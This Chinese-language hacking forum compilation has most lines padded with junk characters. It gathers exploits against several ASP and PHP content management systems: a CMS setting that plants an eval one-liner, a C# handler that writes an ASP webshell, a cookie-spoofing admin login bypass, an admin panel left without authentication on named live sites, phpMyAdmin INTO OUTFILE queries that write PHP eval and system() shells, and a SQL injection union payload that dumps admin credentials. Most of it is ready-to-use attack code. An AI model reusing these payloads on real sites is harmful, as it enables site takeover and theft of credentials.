<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
) S1 h$ Y* V. W8 O3 `4 uUpload a new file:<br>
* ?8 M6 H* A, J) C( r7 }<input type="file" name="NewFile" size="50"><br>
o2 M' S! x- B% ?6 p6 y' @- }<input id="btnUpload" type="submit" value="Upload">
( f% w5 z$ g: c2 n4 l6 S</form>
9 `, a3 d9 X( e6 A7 Y-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------( o2 n- a8 f2 k3 ?) W; }
6 P9 s( ]& D% r ~* S" e* T+ a. q
SDcms 后台拿webshell4 F! i' c) J6 }6 Q
7 n a& N) T- P! Q! i. h! k! `$ F
第一种方法:& X- s! j7 \5 G) Q9 {
进入后台-->系统管理-->系统设置-->系统设置->网站名称;" w+ ]% U' v- V+ f; Y0 J, w
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
2 p- r/ y. C, k* B& N* M( R# v用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。8 ?1 Q5 @' r3 _; n8 H; c: l
第二种方法:
# c; A$ `& P0 \8 i7 C% ^进入后台-->系统管理-->系统设置-->系统设置->上传设置;% @9 S1 |/ m! J+ f: ?& S" u8 |/ r
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
2 K) R: M/ W3 o% y! P9 {第三种方法:" ]8 L0 h' u K( `* j9 U" A
进入后台-->界面管理-->模板文件管理-->创建文件9 l. U2 d/ V$ k- H2 m
文件名写入getshell.ashx
0 t8 g# E/ Z9 w内容写入下面内容:2 a M0 c3 |/ U3 o2 N/ ~
/====================复制下面的=========================/
- H! B4 [ z' E& T<%@ WebHandler Language="C#" Class="Handler" %>
* O+ F3 ]1 o+ l. b6 A$ [" busing System;
. y+ D L8 k% N4 y" S0 F5 {using System.Web;
" D2 g7 b/ M3 d: o2 K6 D. Kusing System.IO;
- a P! j- ]# T- p$ q. opublic class Handler : IHttpHandler {
~# v% v% j& vpublic void ProcessRequest (HttpContext context) {
9 R' A, J! s$ `* tcontext.Response.ContentType = "text/plain";0 C7 x5 A( S4 R' [1 T( p, g
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));- C+ h# d a5 g1 K0 J+ a/ m1 \/ m% i+ s
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
8 r6 G5 U' A/ hfile1.Flush();- @9 F- w/ p7 B5 `' J; y
file1.Close();) Q! g4 x3 F, m2 j" j
}; F% i" D; e1 i9 W7 Y
public bool IsReusable {
- ]/ R( b4 w$ T iget {
- h: p2 G. g" s Z1 W, B. freturn false;: k1 K# ^& T0 N
}
' M' L" T$ I1 |9 n( C) M; L6 e}$ J' `$ p5 t6 ^ Z6 F: t! k, ?+ |9 L$ L
}) k7 L9 M+ S5 G) U. y) _/ Z- T! L( p
/=============================================// Y. _) w2 Z, e
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx$ h7 k0 Q6 w3 e: M
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
- F0 M- ]) k1 o- `8 k-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 C5 f; q$ D2 Z4 Q# S d' Z$ d }8 G+ f# h- h7 A
ESCMS网站管理系统0day- ~/ o3 B2 t: E
5 K- i4 q6 F- i8 x
后台登陆验证是通过admin/check.asp实现的
0 Z! V+ D+ b. L9 G) I7 N& j+ z8 q* A3 r2 [
首先我们打开http://target.com/admin/es_index.html
& D( I6 U+ g) W; b6 Q9 P然后在COOKIE结尾加上
: a+ M: o* m- B. U; ESCMS$_SP2=ES_admin=st0p;
8 X2 P0 M0 D" r5 O$ J9 N# \修改,然后刷新1 A% H' T$ z. b% C) p
进后台了嘎..) V" y' l8 `9 e0 c
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL: R5 F) T9 L, X
# U+ n0 m' s+ S) g
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
' v$ | o2 I% d) ]+ w嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
' h+ N# |9 U) ~. P9 ~存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
1 z( x. ?# w o! B; g; S在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
& V5 q) S6 @1 j" m3 a! q+ f------------------------------------------------------------------------------------------------------------------------------------------------------------------------------" R$ z$ l% ~+ r8 p2 e7 C
& ]- \3 K% i; G3 e0 ^, b/ M+ V w( P
宁志网站管理系统后台无验证漏洞及修复
$ S6 l1 N: k5 u* l- Z5 x* j, L0 K, }5 W" N( Q( H8 k
网上搜了一下,好像没有发布.如有雷同纯粹巧合!+ m( i8 d& j; ~/ O- i
官方网站:www.ningzhi.net
/ _" Q2 p* K/ U学校网站管理系统 V.2011版本
$ K# M- E* i* I+ n: e& {5 ^http://down.chinaz.com/soft/29943.htm & W# f8 B# M5 m$ h
其它版本(如:政府版等),自行下载.
: |. p( {5 p7 n! e漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
0 k9 K3 ?! l5 H) Llogin.asp代码如下:3 Z( n8 J6 W: v4 I5 E0 w
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
, ~" K* t! D* ?0 u& p' Jmanage.asp代码我就不帖出来了.反正也没验证.
7 [/ V9 @% O2 V1 I2 [9 E只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!- o! r: z0 w, l0 X( d4 e
漏洞利用:
6 u# N! ~5 Z; z直接访问http://www.0855.tv/admin/manage.asp
4 [/ @/ i" s5 N& h' X) w数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
1 g Q2 _. \0 k----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 R6 {7 X4 Z6 Y6 o1 o5 @" B' k; {, D* T( ?% _
phpmyadmin拿shell的四种方法总结及修复
& U( `4 S% `6 P$ V0 {9 U" W ?# Z x% _
方法一:: i/ W- J$ \4 d; z8 g, i4 \. K
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );7 O* L9 \/ o" e8 w# z
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
1 h$ F7 c+ N8 U/ C; pSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
; ?. r7 g6 W( ], L----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
% b0 L" J |2 h3 |6 v/ d1 ]( ` L 一句话连接密码:7on K' }: @; j! D0 b4 |6 _
方法二:! Z, [, ^0 q! w3 G
读取文件内容: select load_file('E:/xamp/www/s.php');
8 V6 U6 S& B" H, o0 _- Y写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
& {$ z6 U3 s; r" k7 N2 E% I3 O) B. V! tcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
" N% ^: |" J# e* q方法三:
# Q' ^/ y& o3 F& j1 G' OJhackJ版本 PHPmyadmin拿shell
, A4 K" O; O. T' d, zCreate TABLE study (cmd text NOT NULL);1 ]# P& E- v( \' k1 ], F
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
: d+ ~7 l9 N5 I; j1 ^! j n+ Bselect cmd from study into outfile 'E:/wamp/www/7.php';
2 A0 ~& x7 U0 y0 mDrop TABLE IF EXISTS study;
& x9 d8 m, b4 \<?php eval($_POST[cmd])?>
) y3 [! Y3 p+ {CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
( _ O0 a' E6 @6 E% i2 uINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
' A! ~2 m/ ~3 c# e# a/ M8 U& H$ pSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
3 W; p5 r0 h% ]' R4 gDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。. J- S9 r9 p3 e; |% W5 W
方法四:. H& c7 C$ T- \6 Y! [
select load_file('E:/xamp/www/study.php');& @1 H9 ^* P# Y
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'* c- T+ X8 d. u& l5 C- c* t" j5 [
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
+ }) B+ ?7 M* y. @" r-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 F: T* V) P5 Q$ |$ z
- h# L. { E! E6 ?0 x( K# a- BNO.001中学网站管理系统 Build 110628 注入漏洞
% E$ f5 v% h6 }
( E9 p. H+ A4 @NO.001中学网站管理系统功能模块: K0 M A& T# S5 ~2 _
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等4 v6 S; g5 B; A0 N1 B& y+ m
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息+ B: x: G6 k% D. p
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息# r7 o3 U/ o# H2 f
4.视频图片管理:一级分类,动态添加视频或者图片等信息
. b2 K. b, C, t' d9 r5.留言管理:对留言,修改,删除、回复等管理. @! S a, T" P v3 f0 u! P
6.校友频道:包括校友资料excel导出、管理等功能4 c6 h* {% i% V2 x& K
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
6 \+ _% x) t T0 ]* z1 e默认后台:admin/login.asp
( l8 g4 q; v+ ] c官方演示:http://demo.001cms.net8 T' U: c8 B0 X5 d
源码下载地址:http://down.chinaz.com/soft/30187.htm
0 k D( G% @' m7 K6 D6 a$ REXP:# s# a" `' r4 E% W' y$ a7 A
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
; }1 _, T" |/ ~: r! y$ y测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin& p/ t9 z& Z! D; s
getshell:后台有备份,你懂的. F$ Q" g1 U3 x' T3 ]5 c
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
+ I* Z; z7 {0 k2 k5 K------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |